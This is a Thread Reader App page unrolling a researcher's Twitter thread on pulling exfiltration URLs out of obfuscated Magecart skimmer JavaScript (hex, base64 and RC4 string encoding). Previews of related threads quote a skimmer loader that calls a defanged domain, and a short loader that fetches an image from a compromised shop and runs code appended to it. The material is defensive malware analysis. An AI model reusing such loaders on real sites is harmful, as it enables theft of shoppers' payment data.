Profile picture
, 12 tweets, 5 min read
My Authors
Read all threads
Let’s do a quick dive into quickly pulling out the interesting bits from an obfuscated #magecart script. And by that I mostly mean the exfil URL. This will only cover one of the most common obfuscator types, as featured at javascriptobfuscator.com and obfuscator.io.
There’s lots of other types as well, but this is a good place to start. First, the simplest type, one with hex encoded strings. You can play with that one here: gist.github.com/krautface/aed4…
This is really easy to deobfuscate completely, using beautifier.io, but if you just want to know what’s in that array of strings, just copy the [ … ] into your devtools and hit enter and presto, your work is done.
Next up: base64 encoded. This one is easy as well. First, grab the array (the bits in the square brackets [...]), drop it into devtools, and see what happens. Nothing magical, right? Just spits it back at you. gist.github.com/krautface/e5a5…
Unlike Octal and Hex encoding, Javascript doesn’t just magically handle base64 encoding. So you simply need to decode it using the atob function. Take the array again, paste it into devtools, but now append the following: .map(atob)
And, finally, the difficult one: RC4. It looks like the previous base64 example, but if you try and utilize the previous technique, you’ll end up with a mess. That’s because RC4 is a stream cipher, if you’re bored you can read more here: en.wikipedia.org/wiki/RC4
Here’s an example of a skimmer utilized RC4 encoding. Each string of sufficient length is encoded using a specific string: gist.github.com/krautface/69e8…
If you take that array at the top and try our previous methods you’ll get nowhere, so let’s look at the code a little bit. Since we know that each string needs to be decoded again, there must be a function that will do the decoding and that function must be called repeatedly.
And because of how RC4 works, that function likely takes two arguments. In the example code, there’s only one good candidate: the _0x35cb function.
It takes two arguments, is called repeatedly, and, if you start looking at it, you see some juicy functions being used: atob, replace, charAt, fromCharCode, indexOf, etc
Scroll down a little farther and there’s an array named _0xf97f being built with the output of that function. It takes an index in hex and a key. Drop a debugger; on line 140, run the code, and look at its contents and you’ll see most of the interesting bits of this basic skimmer
And there you go: how to quickly get some of the interesting bits out of this type of obfuscated Javascript code, which is used widely in digital skimmers/#magecart.
Missing some Tweet in this thread? You can try to force a refresh.

Keep Current with Affable Kraut

Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

Twitter may remove this content at anytime, convert it as a PDF, save and print for later use!

Try unrolling a thread yourself!

how to unroll video

1) Follow Thread Reader App on Twitter so you can easily mention us!

2) Go to a Twitter thread (series of Tweets by the same owner) and mention us with a keyword "unroll" @threadreaderapp unroll

You can practice here first or read more on our help page!

Related hashtags

#magecart

More from @AffableKraut see all

Profile picture
Affable Kraut
@AffableKraut
Saw this new digital skimmer/#magecart JS for the first time last week. Haven't had time to dig really deep into it, but here's the basic overview. Calling it the Callback skimmer for now. Above average JS for a digital skimmer.

1/9
As I said, this is going to be a quick overview. Here's the loader:
gist.github.com/krautface/5a29…

2/9
That calls out to hxxps://jquery-cycle[.]com/analytics.js?q=0.44886615665744056 which returns the following code: gist.github.com/krautface/91c6…

It is encoded, but the Callback loader decodes it and runs it. If I recall correctly, that code just makes the same call again.

3/9
Read 10 tweets
Profile picture
Affable Kraut
@AffableKraut
New digital skimmer/#magecart technique: steganography

A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.

1/5
Here's an example of a live image. You can load this image and prepend view-source: The next tweet has the code that loads and runs the code in this image. The full skimmer code is in a gist on the last tweet.

hxxps://www.truthinaging[.]com/media/wysiwyg/FreeShipping.jpg

2/5
var xhr = new XMLHttpRequest();
xhr.open('GET', '<image>', true);
xhr.send();
xhr.onreadystatechange = function() {
if (this.readyState != 4) return;
if (this.status == 200) {
var F=new Function (this.responseText.slice(-19704));
return(F());
}
}

3/5
Read 6 tweets
Profile picture
Affable Kraut
@AffableKraut
I think I stumbled upon a novel digital skimmer/#magecart script still in development and figured I'd share all the code and (limited) infrastructure I've found so far. And I'll share the simple method to stop this technique dead (tweet 16 😉)

First, what makes it unique?

1/17
- Malicious payload is loaded over websockets
- Exfil over websockets
- A rather clever skimmer loader that I think may fool a lot of people
- CSS classes(!) being used to construct the URL

Intrigued? Great. Let's go

2/x
Let's look at the skimmer loader. Look like anything you're used to seeing? querySelector, className, Canvas ondraw? What in the world? Where's the script tag created?

3/x
Read 17 tweets

Embed code for your website

×
Follow Us on Twitter!

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!